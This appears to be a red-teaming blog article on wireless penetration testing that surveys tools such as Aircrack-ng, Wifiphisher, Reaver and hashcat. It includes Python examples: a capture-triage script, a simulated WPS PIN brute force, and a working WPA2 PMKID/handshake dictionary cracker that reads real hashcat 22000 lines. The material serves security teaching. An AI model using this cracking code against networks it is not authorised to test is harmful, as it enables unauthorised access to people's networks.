
Red Teaming: Main tools for wireless penetration tests

March 22, 2022 by Pedro Tavares

Nowadays, wireless networks are everywhere, connecting people, services and computers. To evaluate the security of these networks and the devices on them, this article walks through the overall process of a wireless assessment and the most popular tools used by red teaming professionals.

How do you perform wireless assessments?

There are two things everyone should be concerned about when executing a wireless assessment: being familiar with the test approach and knowing the right tools.

1. Be familiar with the different Wi-Fi devices

Many different devices exist, but understanding how the wireless protocols work and where they are weak is very often the key to success.

2. Fingerprint your whole scope

Planning a well-conducted scan is one of the most critical steps of any red team assessment, and the wireless landscape is no exception. Collect all the information you can about the target scope: SSIDs, Wi-Fi ranges (bands and channels), network segmentation, packet captures, RF signal leakage outside the premises, and the strength of encryption keys and passwords.

3. Exploitation time

After collecting the needed information, prepare the assessment and exploit the targets: brute-force routers with leaked or weak credentials, crack WPA pre-shared keys, test captive portals, deploy rogue access points, look for paths between different wireless networks, and identify devices that should not be reachable by default. Evil Twin attacks and WPA Enterprise misconfigurations are also common attack vectors in this context.

4. Reporting everything

Document every step you performed, and be detailed in listing each finding and how to reproduce it.
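The four steps above as an added example, not part of the original article: a Python script that takes an airodump-ng style CSV export, performs the step 2 triage, picks out the step 3 targets (open and WEP networks, WPA1 still accepted, one ESSID served with inconsistent security as an Evil Twin candidate, and clients probing for networks not present on site) and prints them as step 4 report entries with a reproduction hint. The embedded capture is constructed to resemble airodump-ng's column layout; the MACs and network names are placeholders.

```python
"""Triage an airodump-ng style CSV export into report-ready findings.

Added example, not code from the original article or from aircrack-ng.
SAMPLE_CSV is constructed to resemble airodump-ng's CSV layout (an
access-point table, a blank line, then a station table); no real network
is represented and the MACs are placeholders.
"""
import re
from collections import defaultdict
from typing import Dict, List

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:01, 2022-03-22 10:00:00, 2022-03-22 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,   0,   0.  0.  0.  0,   8, CorpWiFi,
00:11:22:33:44:02, 2022-03-22 10:00:10, 2022-03-22 10:05:00, 11,  54, WEP, WEP, , -55,   80, 300,   0.  0.  0.  0,   7, Printer,
00:11:22:33:44:03, 2022-03-22 10:00:20, 2022-03-22 10:05:00,  1,  54, OPN, , , -60,   70,   0,   0.  0.  0.  0,   5, Guest,
aa:bb:cc:dd:ee:01, 2022-03-22 10:01:00, 2022-03-22 10:05:00,  6,  54, OPN, , , -35,   40,   0,   0.  0.  0.  0,   8, CorpWiFi,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
de:ad:be:ef:00:01, 2022-03-22 10:02:00, 2022-03-22 10:05:00, -50,  30, 00:11:22:33:44:01, CorpWiFi
de:ad:be:ef:00:02, 2022-03-22 10:02:30, 2022-03-22 10:05:00, -70,  12, (not associated), HomeNet,CoffeeShop
"""


def _parse_table(block: str) -> List[Dict[str, str]]:
    """Parse one header-led table. airodump-ng does not quote fields, so a station's
    comma-separated probed ESSID list spills past the header; fold the tail back."""
    lines = [ln for ln in block.splitlines() if ln.strip()]
    header = [h.strip() for h in lines[0].split(",")]
    rows = []
    for line in lines[1:]:
        fields = [f.strip() for f in line.split(",")]
        if len(fields) > len(header):
            fields = fields[:len(header) - 1] + [",".join(fields[len(header) - 1:])]
        fields += [""] * (len(header) - len(fields))
        rows.append(dict(zip(header, fields)))
    return rows


def _finding(severity, category, target, detail, reproduce):
    return {"severity": severity, "category": category, "target": target,
            "detail": detail, "reproduce": reproduce}


def triage(csv_text: str) -> List[Dict[str, str]]:
    """Turn the capture into findings (step 3 targets, step 4 report rows)."""
    sections = [s for s in re.split(r"\n[ \t]*\n", csv_text) if s.strip()]
    aps = _parse_table(sections[0])
    stations = _parse_table(sections[1]) if len(sections) > 1 else []
    known_essids = {ap["ESSID"] for ap in aps if ap["ESSID"]}
    findings, by_essid = [], defaultdict(list)

    for ap in aps:
        by_essid[ap["ESSID"]].append(ap)
        target = f'{ap["ESSID"] or "<hidden>"} ({ap["BSSID"]}, ch {ap["channel"]})'
        row = f'airodump-ng CSV row for {ap["BSSID"]}: Privacy="{ap["Privacy"]}" Cipher="{ap["Cipher"]}" Authentication="{ap["Authentication"]}"'
        tokens = set(ap["Privacy"].split())
        if "OPN" in tokens:
            findings.append(_finding("high", "weak-encryption", target,
                "open network, no link-layer encryption; client traffic is readable and a rogue AP needs no key", row))
        elif "WEP" in tokens:
            findings.append(_finding("high", "weak-encryption", target,
                "WEP in use; key recoverable from collected IVs (aircrack-ng, AirSnort)", row))
        elif "WPA" in tokens:  # WPA1/TKIP still accepted, even when WPA2 is offered too
            findings.append(_finding("medium", "weak-encryption", target,
                "WPA1/TKIP accepted; deprecated cipher, downgrade possible", row))
        if ap["Authentication"] == "MGT":
            findings.append(_finding("info", "enterprise", target,
                "WPA Enterprise (802.1X); check that clients validate the RADIUS server certificate", row))

    # Evil Twin candidates: one ESSID served by several BSSIDs with differing security.
    for essid, group in by_essid.items():
        if essid and len({ap["Privacy"] for ap in group}) > 1:
            findings.append(_finding("high", "evil-twin-candidate", essid,
                "same ESSID advertised with different security settings; clients may auto-join the weaker one",
                "; ".join(f'{ap["BSSID"]}={ap["Privacy"]}' for ap in group)))

    # Clients probing for networks absent on site will associate to a rogue AP using that name.
    for st in stations:
        unseen = [p.strip() for p in st["Probed ESSIDs"].split(",")
                  if p.strip() and p.strip() not in known_essids]
        if unseen:
            findings.append(_finding("medium", "client-probing", st["Station MAC"],
                f'client probes for unseen network(s): {", ".join(unseen)} (Evil Twin / KARMA exposure)',
                f'station row {st["Station MAC"]}: BSSID="{st["BSSID"]}" Probed ESSIDs="{st["Probed ESSIDs"]}"'))
    return findings


SEVERITY_ORDER = {"high": 0, "medium": 1, "low": 2, "info": 3}


def render_report(findings: List[Dict[str, str]]) -> str:
    """Step 4: one block per finding, highest severity first, each with a reproduction hint."""
    lines = []
    for f in sorted(findings, key=lambda f: SEVERITY_ORDER[f["severity"]]):
        lines.append(f'[{f["severity"].upper()}] {f["category"]}: {f["target"]}')
        lines.append(f'    {f["detail"]}')
        lines.append(f'    Reproduce: {f["reproduce"]}')
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_report(triage(SAMPLE_CSV)))
```

On the constructed sample this yields five findings: the WEP printer, two open networks, the CorpWiFi name served both with WPA2 and without encryption, and a client probing for two networks that are not on site. Against a real export the same script works unchanged on the file airodump-ng writes with `-w` (the `.csv`, not the `.kismet.csv`).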

The most popular tools for wireless penetration testing

Aircrack

This is a suite of tools for Wi-Fi network assessments. The tools cover different layers: packet capture, replay attacks, deauthentication, fake access points and packet injection. It can also check Wi-Fi card and driver capabilities, and it includes a cracking module for WEP and WPA/WPA2-PSK.

URL: https://www.aircrack-ng.org/

Airsnort

AirSnort is a WLAN tool capable of cracking encryption keys on 802.11b WEP networks. AirSnort monitors transmissions, computing the encryption key when enough packets have been gathered.

URL: https://sourceforge.net/projects/airsnort/

Kismet

This is a wireless network and device detector. It acts as a sniffer, wardriving tool and wireless intrusion detection framework. Kismet works with Wi-Fi and Bluetooth interfaces, software-defined radios and other capture hardware.

URL: https://www.kismetwireless.net/

Wifiphisher

Wifiphisher is a mature tool within the wireless landscape. It is a rogue access point framework that obtains a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks, a position that is then typically used for credential phishing.

URL: https://github.com/wifiphisher/wifiphisher

Wireshark

Wireshark is an indispensable tool when talking about network packets. It is a network protocol analyzer that dissects captured traffic protocol by protocol, including 802.11 management frames and EAPOL handshakes. This tool is a swiss army knife! More details can be found on the official page.

URL: https://www.wireshark.org/

Reaver

Reaver implements a brute-force attack against Wi-Fi Protected Setup (WPS) registrar PINs to recover WPA/WPA2 passphrases.

URL: https://github.com/t6x/reaver-wps-fork-t6x
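The brute force is feasible because WPS validates the registrar PIN in two halves: the access point's response to the registrar's M4 message reveals whether the first four digits were right, its response to M6 reveals the rest, and the eighth digit is a checksum of the other seven. The following Python, an added example that is not Reaver's code, computes that checksum, enumerates the two candidate spaces and simulates the search against a constructed stand-in for the access point, which shows the 11,000-attempt worst case instead of 10^8.

```python
"""WPS PIN checksum and the split-PIN search that Reaver performs.

Added example, not Reaver's code. The "oracle" below is a constructed stand-in
for an access point; no WPS exchange is actually performed.
"""
from typing import Callable, Iterator, Optional


def wps_pin_checksum(first_seven: int) -> int:
    """Checksum digit for a 7-digit WPS PIN prefix (weights 3,1,3,1,... from the right)."""
    accum = 0
    pin = first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit is the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and wps_pin_checksum(int(pin[:7])) == int(pin[7])


def first_half_candidates() -> Iterator[str]:
    """10^4 possibilities for digits 1-4; the AP's answer to M4 confirms or rejects each."""
    return (f"{i:04d}" for i in range(10000))


def second_half_candidates(first_half: str) -> Iterator[str]:
    """Given a confirmed first half only 10^3 PINs remain: digits 5-7 are free and
    digit 8 is fixed by the checksum, so it is never guessed."""
    for i in range(1000):
        prefix = first_half + f"{i:03d}"
        yield prefix + str(wps_pin_checksum(int(prefix)))


def brute_force(oracle: Callable[[str, str], bool]) -> Optional[str]:
    """Reaver's search order: fix the first half, then the second.
    oracle("first", "1234") plays the AP's reply to M4; oracle("full", pin) its reply to M6."""
    for first_half in first_half_candidates():
        if oracle("first", first_half):
            for pin in second_half_candidates(first_half):
                if oracle("full", pin):
                    return pin
    return None


def make_oracle(secret_pin: str):
    """Constructed AP stand-in with registrar PIN `secret_pin`; also counts attempts,
    i.e. what a real run would spend in M4/M6 round trips."""
    attempts = {"count": 0}

    def oracle(stage: str, candidate: str) -> bool:
        attempts["count"] += 1
        if stage == "first":
            return candidate == secret_pin[:4]
        return candidate == secret_pin

    return oracle, attempts


if __name__ == "__main__":
    for secret in ("12345670", "99999995"):  # both carry a correct checksum digit
        oracle, attempts = make_oracle(secret)
        found = brute_force(oracle)
        print(f"{secret}: recovered {found} after {attempts['count']} attempts "
              f"(full 8-digit space would be {10 ** 8})")
```

The second PIN is the worst case for this search order: 10,000 attempts on the first half plus 1,000 on the second. Real access points add lockouts and rate limits on top, which is why Reaver runs take hours rather than seconds, but the PIN space itself is what the tool exploits.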

Cracking WPA/WPA2 with hashcat

Hashcat is an advanced password recovery tool. It supports five unique attack modes for over 300 highly optimized hashing algorithms, and runs on CPUs, GPUs and other hardware accelerators on Linux, Windows and macOS. It also supports distributed password cracking to speed up the process.

Within the wireless context, the following hash modes cover WPA material captured from PMKIDs and from EAPOL (4-way handshake) frames. Mode 22000 takes passphrase candidates and derives the PMK itself; 22001 takes precomputed PMKs:

22000 | WPA-PBKDF2-PMKID+EAPOL

22001 | WPA-PMK-PMKID+EAPOL

More details about these modes are in the hashcat documentation.

URL: https://github.com/hashcat/hashcat
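To show what those two modes actually compute, here is an added example, not hashcat's code and not from the original article: the PBKDF2 derivation of the PMK from passphrase and ESSID, the PMKID (22000 line type 01, obtainable from the AP's first handshake message alone) and the EAPOL MIC of the 4-way handshake (line type 02), followed by a small dictionary attack over hash lines written in the 22000 layout. ESSID, MAC addresses, nonces, the EAPOL frame and the passphrase are constructed test data, not a real capture; the only real test vector is the PBKDF2 one from the 802.11i standard.

```python
"""What hashcat mode 22000 computes for WPA2-PSK: PMK, PMKID and EAPOL MIC,
plus a small dictionary attack over hash lines in the 22000 layout.

Added example; this is not hashcat's code. ESSID, MAC addresses, nonces,
the EAPOL frame and the passphrase are constructed test data, not a capture.
"""
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

MIC_OFFSET = 81    # EAPOL header (4) + key descriptor fields before the MIC (77)
NONCE_OFFSET = 17  # EAPOL header (4) + descriptor type, key info, key length, replay counter (13)


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
    This is the expensive step GPUs accelerate, and why weak passphrases fall."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC); the AP sends it in
    message 1, so no client needs to complete the handshake (22000 type 01)."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def derive_ptk(pmk: bytes, mac_ap: bytes, mac_sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 with label "Pairwise key expansion"; the first 16 bytes are the KCK."""
    data = min(mac_ap, mac_sta) + max(mac_ap, mac_sta) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed (key descriptor version 2: HMAC-SHA1-128)."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def pmkid_hash_line(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, essid: str) -> str:
    return f"WPA*01*{pmkid.hex()}*{mac_ap.hex()}*{mac_sta.hex()}*{essid.encode().hex()}***"


def eapol_hash_line(mic, mac_ap, mac_sta, essid, anonce, eapol_frame, message_pair=0) -> str:
    return (f"WPA*02*{mic.hex()}*{mac_ap.hex()}*{mac_sta.hex()}*{essid.encode().hex()}"
            f"*{anonce.hex()}*{eapol_frame.hex()}*{message_pair:02x}")


def crack_22000(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on one 22000 line; returns the passphrase or None."""
    f = line.split("*")
    kind, target = f[1], bytes.fromhex(f[2])
    mac_ap, mac_sta, essid = bytes.fromhex(f[3]), bytes.fromhex(f[4]), bytes.fromhex(f[5]).decode()
    for candidate in wordlist:
        pmk = derive_pmk(candidate, essid)
        if kind == "01":
            got = compute_pmkid(pmk, mac_ap, mac_sta)
        else:
            anonce, eapol = bytes.fromhex(f[6]), bytes.fromhex(f[7])
            snonce = eapol[NONCE_OFFSET:NONCE_OFFSET + 32]  # message 2 carries the SNonce
            got = eapol_mic(derive_ptk(pmk, mac_ap, mac_sta, anonce, snonce)[:16], eapol)
        if hmac.compare_digest(got, target):
            return candidate
    return None


# Constructed capture (not real): AP/STA MACs, nonces and a minimal EAPOL-Key message 2.
ESSID, SECRET = "CorpWiFi", "correct horse"
MAC_AP, MAC_STA = bytes.fromhex("001122334401"), bytes.fromhex("deadbeef0001")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))


def build_m2_frame(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """EAPOL version 2, type Key; RSN descriptor (type 2), key info 0x010a (version 2,
    pairwise, MIC set), key length 16, replay counter 1, nonce, IV, RSC, ID, MIC, no key data."""
    body = (b"\x02\x01\x0a\x00\x10" + (1).to_bytes(8, "big") + snonce
            + bytes(16) + bytes(8) + bytes(8) + mic + b"\x00\x00")
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def sample_hash_lines() -> Tuple[str, str]:
    """The two hash lines a capture of this constructed network would convert to."""
    pmk = derive_pmk(SECRET, ESSID)
    pmkid_line = pmkid_hash_line(compute_pmkid(pmk, MAC_AP, MAC_STA), MAC_AP, MAC_STA, ESSID)
    kck = derive_ptk(pmk, MAC_AP, MAC_STA, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, build_m2_frame(SNONCE))
    eapol_line = eapol_hash_line(mic, MAC_AP, MAC_STA, ESSID, ANONCE, build_m2_frame(SNONCE, mic))
    return pmkid_line, eapol_line


if __name__ == "__main__":
    wordlist = ["password", "letmein", SECRET, "admin123"]
    for line in sample_hash_lines():
        print(line[:40] + "...", "->", crack_22000(line, wordlist))
```

Every candidate costs one PBKDF2 run of 4096 HMAC-SHA1 iterations, which is the whole cost of the attack; hashcat's advantage over this script is running that step on the GPU, and mode 22001 exists precisely to skip it when PMKs were precomputed for a known ESSID.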

 


Pedro Tavares

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and Security Evangelist. He is also Editor-in-Chief of the computer security blog seguranca-informatica.pt. In recent years, he has invested in the field of information security, exploring and analyzing a wide range of topics, such as malware, reverse engineering, pentesting (Kali Linux), hacking/red teaming, mobile, cryptography, IoT, and security in computer networks. He is also a freelance writer.